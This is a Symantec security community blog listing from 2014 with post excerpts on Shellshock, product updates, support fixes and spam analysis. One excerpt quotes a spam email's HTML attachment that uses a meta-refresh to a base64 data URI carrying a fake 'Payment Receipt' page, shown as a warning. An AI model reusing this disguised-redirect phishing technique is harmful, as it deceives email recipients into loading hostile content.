Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog
Showing posts in English
vgtero | 03 Oct 2014 | 1 comment

There is a new vulnerability in the commonly used UNIX shell BASH, which the media is now calling Shellshock.  

What is Shellshock? 

A new vulnerability has been found that potentially affects most versions of the Linux and UNIX operating systems, in addition to Mac OS X (which is based around Unix). Known as the “Bash Bug” or “Shellshock,” the GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271) could allow an attacker to gain control over a targeted computer if exploited successfully.

The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and UNIX. Bash acts as a command language interpreter. In other words, it allows the user to type commands into a simple text-based window, which the operating system will then run.

For full details see: the Symantec Security...

jjesse | 03 Oct 2014 | 0 comments

Recently I was doing an install of Symantec DLP on a Red Hat Linux box that was a member of LDAP and had the /home folder automounted and didn't allow for us to write to that folder.  When a new local user was created via the adduser command it would not work without passing a command line option to change the location of the home directory (adduser -b /opt/users/).

During the install of Symantec DLP, the installer creates a user (protect, protect_update) and would fail because the home directory (/home/protect) could not be created.

So the question was asked… Can we create a user, populate the home directory outside of /home and then perform the install of the system?

Answer:  No… The installer for Symantec DLP needs to create the correct users and must be able to write /home when creating the user.  There is currently an enhancement request within Symantec to allow a pre-created account.

vgtero | 01 Oct 2014 | 0 comments

There is a new vulnerability in the commonly used Unix shell BASH, which the media is now calling Shellshock.   Customers that have Critical Systems Protection/Data Center Security: Server Advanced can use their investments to protect their server infrastructure from this vulnerability. 

Situation Overview:   What is “Shellshock?” 

A new vulnerability has been found that potentially affects most versions of the Linux and Unix operating systems, in addition to Mac OS X (which is based around Unix). Known as the “Bash Bug” or “ShellShock,” this vulnerability could allow an attacker to gain control over a targeted computer if exploited successfully.

The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix. Bash acts as a command language interpreter. In other words, it allows the user to type commands into a simple text-based window, which the operating...

Dhasan | 29 Sep 2014 | 0 comments

Issue : Non-English character is not showing up in Symantec Endpoint Protection Manager reports in Excel

Cause : SEPM compatible with UTF-8 encoding

 

Solution :

1. Open the CSV report file in Notepad.

2. Click on save as 'UTF-8' under encoding.

3. Then Open CSV in Excel.

 

mon_raralio | 22 Sep 2014 | 3 comments

Hi all! It's been a while since I was here (a little over 2 years). A lot has changed. Anyway, let's get to it.

How Code injection is used

I've received 2 spam mails on my Yahoo account, which by the way, scans any attachments using Norton. There is an http attachment which I wouldn't recommend you clicking on to open a new browser tab or window. The attachment looks like this:

<html>
<title> </title>
<meta http-equiv="refresh" content="0;data:text/html;base64,DQo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtDQoNCnRyYW5zaXRpb25hbC5kdGQiPjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPHRpdGxlPlBheW1lbnQgUmVjZWlwdDwvdGl0bGU+DQo8ZnJhbWVzZXQ+...
Steve C Blair | 22 Sep 2014 | 0 comments

Building great software begins and ends with you, our customer. By giving you visibility into our software and asking for your feedback, advice, and suggestions, we deliver better software solutions to help you solve your security needs.

Symantec will be releasing a new version of our Data Center Security (DCS) solution in the first half of calendar year 2015. DCS version 6.5 will include an enhanced architecture, deliver a web-based unified console, include support for virtual computing environments and support policy based security controls in an integrated offering.  DCS 6.5 delivers the protection capability to take control of your IT environment by coordinating threat management and collaborative security on virtual workloads.  Additionally DCS 6.5 provides new software defined security functionally to create and orchestrate multi-product security...

Chetan Savade | 19 Sep 2014 | 27 comments

Hello Everyone,

On September 18, 2014, Symantec released Symantec Endpoint Protection 12.1 Release Update 5 (12.1.5). You can download this version from Symantec FileConnect.

Symantec Endpoint Protection 12.1.5 includes a number of new features, including:

Bandwidth throttling to control client/server communication traffic
Content storage optimization that greatly reduces disk space used by Symantec Endpoint Protection Manager. It's applicable only for SEPM not for clients.
Symantec Endpoint Protection for Linux, which allows Linux clients to be managed through the Endpoint Protection Manager
For more information about this release, read the Release Notes or the updated product documentation in the Related Articles section.   

Refer this blog:...

Christopher Johnson | 16 Sep 2014 | 0 comments

On September 15, 2014, Symantec issued a SONAR release via Live Update definitions, which erroneously detected some low prevalence files as malicious. The false positive was reported as a SONAR.SuspLaunch detection.

Symantec discovered the issue and had a roll back release available to the field within forty five minutes.  But unfortunately some customers were affected by the issue.  All customers with current SONAR definitions  will not be affected by the issue. The problem has been corrected.

Symantec is currently addressing the internal factors that caused the problem and will make the proper changes to ensure we do not repeat this issue.

Srikanth_Subra | 10 Sep 2014 | 0 comments

On Tuesday, versions of Internet Explorer began blocking out-of-date ActiveX controls – primarily as a way of preventing security flaws from being exploited and users from being compromised.

The feature, which was discussed by Microsoft in August, works with Internet Explorer 8 through Internet Explorer 11 on Windows 7 SP1 and up, as well as on Windows Server 2008 R2 SP1 and up, according to a post, which adds it is active in all Security Zones except the Local Intranet Zone and the Trusted Sites Zone.

A notification bar in Internet Explorer will let users know when the browser is blocking an outdated ActiveX control, and will offer the option to update, the post indicates, adding that users can interact with parts of the webpage not impacted by the ActiveX control.

The company stated that Internet Explorer...

Kari Ann | 09 Sep 2014 | 0 comments

The best part of my job is when I get to talk to customers using Symantec Endpoint Protection. Like a moth to the flame, I’m curious about how our customers actually use the product, what they love about it, or what drives them a little crazy. Lately, I’ve peppered most conversations with two simple questions: 

1) Are you ready for the upcoming SEP 11 EOSL with up-to-date software? 

2) Are you aware of, and using, the full protection stack in SEP 12.1 (beyond Antivirus)?

In most cases, the answer to one or both questions is a variation of “nope.” Since I can’t talk to EVERY customer, we’re inviting you to take 5 minutes to conduct a Security Self-Assessment and share a few FREE resources that you may not be aware of, to help you maximize your security investment in Endpoint Protection. 

...